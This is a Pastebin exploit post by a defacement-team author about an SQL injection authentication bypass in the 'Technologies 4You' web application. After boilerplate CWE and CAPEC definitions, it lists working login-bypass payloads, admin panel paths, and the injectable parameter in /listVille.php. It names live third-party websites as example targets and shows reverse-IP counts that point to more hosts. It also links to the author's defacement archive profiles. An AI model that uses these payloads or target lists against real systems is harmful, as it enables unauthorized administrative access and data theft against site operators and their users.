Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Technologies 4You SQL Injection Authentication Bypass
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 22 May 2020
- # Vendor Homepage : technologies-4you.com
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- CAPEC-66 [ SQL Injection ]
- CWE-287 [ Improper Authentication ]
- CAPEC-115 [ Authentication Bypass ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/KingSkrupellos
- # Zone-H : zone-h.org/archive/notifier=KingSkrupellos
- zone-h.org/archive/notifier=CyBeRiZM
- # Mirror-H : mirror-h.org/search/hacker/948/
- mirror-h.org/search/hacker/94/
- mirror-h.org/search/hacker/1826/
- # Defacer.ID : defacer.id/archive/attacker/KingSkrupellos
- defacer.id/archive/team/Cyberizm-Org
- # Inj3ctor : 1nj3ctor.com/attacker/43/ ~ 1nj3ctor.com/attacker/59/
- # Aljyyosh : aljyyosh.org/hacker.php?id=KingSkrupellos
- aljyyosh.org/hacker.php?id=Cyberizm.Org
- aljyyosh.org/hacker.php?id=Cyberizm
- # Zone-D : zone-d.org/attacker/id/69
- # Pastebin : pastebin.com/u/KingSkrupellos
- # Cyberizm.Org : cyberizm.org/forum-exploits-vulnerabilities
- ###################################################################
- # Impact :
- ***********
- Technologies 4You is prone to an SQL-injection vulnerability because
- it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application, access or
- modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application and
- execute arbitrary SQL commands in application`s database. Further exploitation of this
- vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser or with any SQL Injector Tool.
- CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
- ***********************************************************************************
- The software constructs all or part of an SQL command using externally-influenced input from an
- upstream component, but it does not neutralize or incorrectly neutralizes special elements that could
- modify the intended SQL command when it is sent to a downstream component.
- CAPEC-66: SQL Injection
- ************************
- This attack exploits target software that constructs SQL statements based on user input.
- An attacker crafts input strings so that when the target software constructs SQL statements
- based on the input, the resulting SQL statement performs actions other than those the application intended.
- SQL Injection results from failure of the application to appropriately validate input.
- When specially crafted user-controlled input consisting of SQL syntax is used without proper validation
- as part of SQL queries, it is possible to glean information from the database in ways not envisaged
- during application design. Depending upon the database and the design of the application,
- it may also be possible to leverage injection to have the database execute system-related commands
- of the attackers' choice. SQL Injection enables an attacker to talk directly to the database,
- thus bypassing the application completely. Successful injection can cause information disclosure
- as well as ability to add or modify data in the database.
- CWE-287 [ Improper Authentication ]
- **********************************
- Authentication is any process by which a system verifies the identity of a user who wishes
- to access it.When an actor claims to have a given identity, the software does not
- prove or insufficiently proves that the claim is correct. Improper authentication
- occurs when an application improperly verifies the identity of a user.
- A software incorrectly validates user's login information and as a result, an attacker can
- gain certain privileges within the application or disclose sensitive information that allows
- them to access sensitive data and provoke arbitrary code execution.
- The weakness is introduced during Architecture and Design, Implementation stages.
- CAPEC-115 [ Authentication Bypass ]
- ***********************************
- An attacker gains access to application, service, or device with the privileges
- of an authorized or privileged user by evading or circumventing an authentication mechanism.
- The attacker is therefore able to access protected data without authentication ever having taken place.
- This refers to an attacker gaining access equivalent to an authenticated user without ever going
- through an authentication procedure. This is usually the result of the attacker using an unexpected
- access procedure that does not go through the proper checkpoints where authentication should occur.
- For example, a web site might assume that all users will click through a given link in order to get to
- secure material and simply authenticate everyone that clicks the link. However, an attacker might be
- able to reach secured web content by explicitly entering the path to the content rather than clicking
- through the authentication link, thereby avoiding the check entirely. This attack pattern differs from
- other authentication attacks in that attacks of this pattern avoid authentication entirely, rather than
- faking authentication by exploiting flaws or by stealing credentials from legitimate users.
- ###################################################################
- Administrator Username : '=''or'
- Administrator Password : '=''or'
- Administrator Username : anything' OR 'x'='x
- Administrator Username : anything' OR 'x'='x
- Administrator Username : x' or 1=1 or 'x'='y
- Administrator Password : x' or 1=1 or 'x'='y
- /admin/
- /admin/gestionclient.php
- /admin/miseajour.php
- /admin/gestionannonce.php
- ScreenShot Administrator Panel =>
- *******************************
- https://www.upload.ee/image/11744168/technologies4youadminpanel22052020.png
- # SQL Vulnerable File :
- **********************
- /listVille.php
- # SQL Vulnerable Parameter :
- ***************************
- ?page=&departement=
- # SQL Injection Exploit :
- **********************
- /listVille.php?page=&departement=[SQL Injection]
- ###################################################################
- # Example Vulnerable Sites :
- *************************
- [+] france-taxi-conventionne-cpam.fr/listVille.php?page=&departement=1%27
- [+] taxi-conventionne-cpam-france.fr/admin/gestionannonce.php
- Reverse IP results for (185.98.131.132)
- There are 1,149 domains hosted on this server.
- Reverse IP results for (185.98.131.130)
- There are 1,314 domains hosted on this server.
- Reverse IP results for (185.98.131.144)
- There are 1,401 domains hosted on this server.
- ###################################################################
- # Example SQL Database Error :
- ****************************
- Fatal error: Uncaught PDOException: SQLSTATE[42000]: Syntax error or access violation:
- 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB
- server version for the right syntax to use near '-30, 30' at line 1 in /htdocs/listVille.php:306
- Stack trace: #0 /htdocs/listVille.php(306): PDO->query('SELECT * FROM v...') #1
- {main} thrown in /htdocs/listVille.php on line 306
- ###################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ###################################################################
Add Comment
Please, Sign In to add comment